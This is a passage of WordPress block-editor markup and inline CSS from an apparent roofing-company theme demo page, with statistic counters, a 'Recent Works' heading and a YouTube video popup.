.skt-blocks-block-5e59b298-d780-4209-b22a-80f2d01b659f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-5e59b298-d780-4209-b22a-80f2d01b659f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-5e59b298-d780-4209-b22a-80f2d01b659f .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-5e59b298-d780-4209-b22a-80f2d01b659f.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-5e59b298-d780-4209-b22a-80f2d01b659f skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">3541</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Project Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"77c81e36-750b-4bd3-8584-7a22066a2f9d\"} -->\n<style type=\"text/css\"> .block-77c81e36-750b-4bd3-8584-7a22066a2f9d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-77c81e36-750b-4bd3-8584-7a22066a2f9d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-77c81e36-750b-4bd3-8584-7a22066a2f9d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-77c81e36-750b-4bd3-8584-7a22066a2f9d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-77c81e36-750b-4bd3-8584-7a22066a2f9d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-77c81e36-750b-4bd3-8584-7a22066a2f9d\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"62d355f3-d85d-4c4c-9fd1-3830b7007515\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-62d355f3-d85d-4c4c-9fd1-3830b7007515 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-62d355f3-d85d-4c4c-9fd1-3830b7007515 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-62d355f3-d85d-4c4c-9fd1-3830b7007515 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-62d355f3-d85d-4c4c-9fd1-3830b7007515 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-62d355f3-d85d-4c4c-9fd1-3830b7007515 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-62d355f3-d85d-4c4c-9fd1-3830b7007515 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-62d355f3-d85d-4c4c-9fd1-3830b7007515 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-62d355f3-d85d-4c4c-9fd1-3830b7007515.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-62d355f3-d85d-4c4c-9fd1-3830b7007515.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-62d355f3-d85d-4c4c-9fd1-3830b7007515 .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-62d355f3-d85d-4c4c-9fd1-3830b7007515.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-62d355f3-d85d-4c4c-9fd1-3830b7007515.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-62d355f3-d85d-4c4c-9fd1-3830b7007515 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-62d355f3-d85d-4c4c-9fd1-3830b7007515.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-62d355f3-d85d-4c4c-9fd1-3830b7007515.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-62d355f3-d85d-4c4c-9fd1-3830b7007515 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-62d355f3-d85d-4c4c-9fd1-3830b7007515.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-62d355f3-d85d-4c4c-9fd1-3830b7007515 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"0a9e8806-6ab7-4ef2-8d85-c9becff87bfc\"} -->\n<style type=\"text/css\"> .block-0a9e8806-6ab7-4ef2-8d85-c9becff87bfc .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0a9e8806-6ab7-4ef2-8d85-c9becff87bfc .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0a9e8806-6ab7-4ef2-8d85-c9becff87bfc .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-0a9e8806-6ab7-4ef2-8d85-c9becff87bfc .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0a9e8806-6ab7-4ef2-8d85-c9becff87bfc .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0a9e8806-6ab7-4ef2-8d85-c9becff87bfc\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"8e20488d-42bd-438e-b10c-09c26d03b1b1\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-8e20488d-42bd-438e-b10c-09c26d03b1b1 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8e20488d-42bd-438e-b10c-09c26d03b1b1 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-8e20488d-42bd-438e-b10c-09c26d03b1b1 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8e20488d-42bd-438e-b10c-09c26d03b1b1 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-8e20488d-42bd-438e-b10c-09c26d03b1b1 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8e20488d-42bd-438e-b10c-09c26d03b1b1 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8e20488d-42bd-438e-b10c-09c26d03b1b1 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-8e20488d-42bd-438e-b10c-09c26d03b1b1.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-8e20488d-42bd-438e-b10c-09c26d03b1b1.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-8e20488d-42bd-438e-b10c-09c26d03b1b1 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-8e20488d-42bd-438e-b10c-09c26d03b1b1.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-8e20488d-42bd-438e-b10c-09c26d03b1b1.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-8e20488d-42bd-438e-b10c-09c26d03b1b1 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-8e20488d-42bd-438e-b10c-09c26d03b1b1.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-8e20488d-42bd-438e-b10c-09c26d03b1b1.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-8e20488d-42bd-438e-b10c-09c26d03b1b1 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-8e20488d-42bd-438e-b10c-09c26d03b1b1.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-8e20488d-42bd-438e-b10c-09c26d03b1b1 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">120</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Qualified Satff</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"e8181347-91e5-4847-9f14-2f30e0a460cb\",\"topPadding\":100,\"topPaddingMobile\":60,\"topPaddingTablet\":80,\"bottomPadding\":0,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/video-bg.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-6\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-6 skt-blocks-block-section-outer-wrap block-e8181347-91e5-4847-9f14-2f30e0a460cb background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-e8181347-91e5-4847-9f14-2f30e0a460cb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-e8181347-91e5-4847-9f14-2f30e0a460cb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 60px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-e8181347-91e5-4847-9f14-2f30e0a460cb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-e8181347-91e5-4847-9f14-2f30e0a460cb.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/video-bg.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-e8181347-91e5-4847-9f14-2f30e0a460cb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-e8181347-91e5-4847-9f14-2f30e0a460cb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-e8181347-91e5-4847-9f14-2f30e0a460cb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-e8181347-91e5-4847-9f14-2f30e0a460cb.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-e8181347-91e5-4847-9f14-2f30e0a460cb .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-e8181347-91e5-4847-9f14-2f30e0a460cb .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-e8181347-91e5-4847-9f14-2f30e0a460cb.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-e8181347-91e5-4847-9f14-2f30e0a460cb .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-e8181347-91e5-4847-9f14-2f30e0a460cb.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-e8181347-91e5-4847-9f14-2f30e0a460cb .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-e8181347-91e5-4847-9f14-2f30e0a460cb.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"a18ce0c4-a3ed-4135-a1fa-bc1da716ec48\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":64,\"subHeadingTitleFontSizeMobile\":34,\"subHeadingTitleFontSizeTablet\":50,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a18ce0c4-a3ed-4135-a1fa-bc1da716ec48 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a18ce0c4-a3ed-4135-a1fa-bc1da716ec48 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-a18ce0c4-a3ed-4135-a1fa-bc1da716ec48 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a18ce0c4-a3ed-4135-a1fa-bc1da716ec48 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a18ce0c4-a3ed-4135-a1fa-bc1da716ec48 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a18ce0c4-a3ed-4135-a1fa-bc1da716ec48 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a18ce0c4-a3ed-4135-a1fa-bc1da716ec48 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a18ce0c4-a3ed-4135-a1fa-bc1da716ec48 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a18ce0c4-a3ed-4135-a1fa-bc1da716ec48 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a18ce0c4-a3ed-4135-a1fa-bc1da716ec48 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a18ce0c4-a3ed-4135-a1fa-bc1da716ec48 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a18ce0c4-a3ed-4135-a1fa-bc1da716ec48 .responsive-heading-desc-text {\n font-size: 64px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a18ce0c4-a3ed-4135-a1fa-bc1da716ec48 .responsive-heading-desc-text {\n font-size: 50px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a18ce0c4-a3ed-4135-a1fa-bc1da716ec48 .responsive-heading-desc-text {\n font-size: 34px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-a18ce0c4-a3ed-4135-a1fa-bc1da716ec48 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-a18ce0c4-a3ed-4135-a1fa-bc1da716ec48 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a18ce0c4-a3ed-4135-a1fa-bc1da716ec48 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-a18ce0c4-a3ed-4135-a1fa-bc1da716ec48\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\">We’re Providing Premium<br>Roofing Services</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/video-popup {\"videoLink\":\"https://www.youtube.com/embed/7er8Dz9JaO0\",\"vidheight\":300,\"opacity\":0,\"counterId\":\"1e1a7899-d1e5-4f16-b900-c5c06df780f1\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-1e1a7899-d1e5-4f16-b900-c5c06df780f1 .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: 300px; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-1e1a7899-d1e5-4f16-b900-c5c06df780f1 .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-1e1a7899-d1e5-4f16-b900-c5c06df780f1 .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n</style><div class=\"skt-blocks-block-1e1a7899-d1e5-4f16-b900-c5c06df780f1 skt-blocks-video-popup alignundefined\"><div class=\"skt-blocks-video-popup__wrapper\" data-video=\"7er8Dz9JaO0\" style=\"border-width:1px;border-style:none;box-shadow:0px 0px   undefined \"><a href=\"#\" class=\"skt-blocks-video-popup__overlay\"></a><span class=\"skt-blocks-video-popup__play-button\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"30\" height=\"30\" viewbox=\"0 0 256 320\" style=\"width:30px;height:30px;fill:#ffffff;opacity:1\"><path d=\"M0 0v320l256-160L0 0z\"></path></svg></span></div></div>\n<!-- /wp:skt-blocks/video-popup --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section 